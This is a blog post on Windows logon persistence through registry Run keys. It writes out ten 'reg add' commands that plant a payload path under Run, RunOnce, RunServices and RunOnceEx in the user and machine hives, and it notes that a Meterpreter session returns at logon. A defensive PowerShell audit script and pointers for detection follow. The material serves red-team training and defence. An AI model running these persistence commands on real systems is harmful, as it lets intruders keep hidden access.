Persistence: Registry Run Keys

Introduction: Using a registry key to execute an arbitrary payload during Windows logon is one of the oldest tricks in the red team playbook.

The principle: a value can be added from the terminal to one of the Run keys to achieve persistence. These keys contain a reference to the actual payload, which is executed when the user logs on. Persistent threats and red teams are known to use the following registry locations.

In the current user's registry hive, the following four keys can be used to launch a program at logon.

1. reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
2. reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
3. reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
4. reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"

The keys above live in the current user's hive. If credentials have been elevated, it is better to use the local machine registry location instead, because the payload will then be launched at every logon on that system, regardless of which user authenticates.

The local machine registry locations are as follows:

1. reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\programdata\pentestlab.exe"
2. reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\programdata\pentestlab.exe"
3. reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\programdata\pentestlab.exe"
4. reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\programdata\pentestlab.exe"

At the next logon, the payload is executed and a Meterpreter session is returned.

Two further registry locations may allow the red team to achieve persistence by executing an arbitrary executable or DLL. These are executed during logon and require administrator-level privileges.

1. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
2. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.dll"
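As an added example (not code from the original post or from the pentestlab article it summarises), the following PowerShell script enumerates every registry location listed above, for both the current-user and local-machine hives plus the numbered RunOnceEx subkeys, and flags any entry whose executable lives in a user-writable directory. This is the check a defender would run to find the kind of value the commands above create. The function names and the list of suspicious path prefixes are assumptions for this example, chosen to match the paths used in the commands. RunServices and RunServicesOnce are legacy Windows 9x keys that NT-based Windows no longer processes at logon, but the script still reads them, since a value written there remains an indicator worth reviewing.

```powershell
# Added example (not from the original post): audit the logon-persistence
# registry locations discussed above. Run in an elevated PowerShell session
# so that the HKLM keys can be read.

$RunKeyPaths = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunServices',      # legacy (Win9x)
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce',  # legacy (Win9x)
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunServices',      # legacy (Win9x)
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'   # legacy (Win9x)
)

# RunOnceEx uses numbered subkeys (e.g. 0001) with an optional Depend subkey
# that lists DLLs; enumerate every subkey beneath it and include their values.
$RunOnceEx = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx'
if (Test-Path -Path $RunOnceEx) {
    $RunKeyPaths += Get-ChildItem -Path $RunOnceEx -Recurse | ForEach-Object { $_.PSPath }
}

# Directories an unprivileged user can normally write to. An entry launching
# from one of these is not proof of compromise but deserves manual review.
# This prefix list is an assumption for the example; extend it for your estate.
$SuspiciousPrefixes = @('C:\Users\', 'C:\ProgramData\', 'C:\tmp\', $env:TEMP)

function Test-SuspiciousCommand {
    param([string]$Command)
    # Reduce a command line such as "C:\path\app.exe" /arg to its executable path.
    $exe = ($Command -replace '^"([^"]+)".*$', '$1').Trim()
    if ($exe -eq $Command) { $exe = $Command.Split(' ')[0] }
    foreach ($prefix in $SuspiciousPrefixes) {
        if ($prefix -and $exe.StartsWith($prefix, [System.StringComparison]::OrdinalIgnoreCase)) {
            return $true
        }
    }
    return $false
}

function Get-RunKeyEntries {
    param([string[]]$Paths)
    foreach ($path in $Paths) {
        if (-not (Test-Path -Path $path)) { continue }   # legacy keys are usually absent
        $item = Get-ItemProperty -Path $path
        # Get-ItemProperty adds PS* metadata properties (PSPath, PSParentPath, ...);
        # everything else is a real registry value.
        foreach ($prop in $item.PSObject.Properties) {
            if ($prop.Name -like 'PS*') { continue }
            $command = [string]$prop.Value
            [pscustomobject]@{
                Key        = $path
                ValueName  = $prop.Name
                Command    = $command
                Suspicious = Test-SuspiciousCommand -Command $command
            }
        }
    }
}

# Flagged entries sort to the top of the report.
Get-RunKeyEntries -Paths $RunKeyPaths |
    Sort-Object -Property Suspicious -Descending |
    Format-Table -AutoSize
```

A one-off run of this script answers "what is set right now"; to catch a value being written, the corresponding detection is Sysmon Event ID 13 (RegistryEvent: Value Set) scoped to these key paths, or a scheduled diff of the script's output against a known-good baseline. The Win32_StartupCommand CIM class and Sysinternals Autoruns cover the same locations if you prefer a tool over a script.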

Other frameworks, such as Empire and Metasploit, provide modules that automate this technique; refer to the following article, where they are described.

Reference: https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/

Origin www.cnblogs.com/zpchcbd/p/11804491.html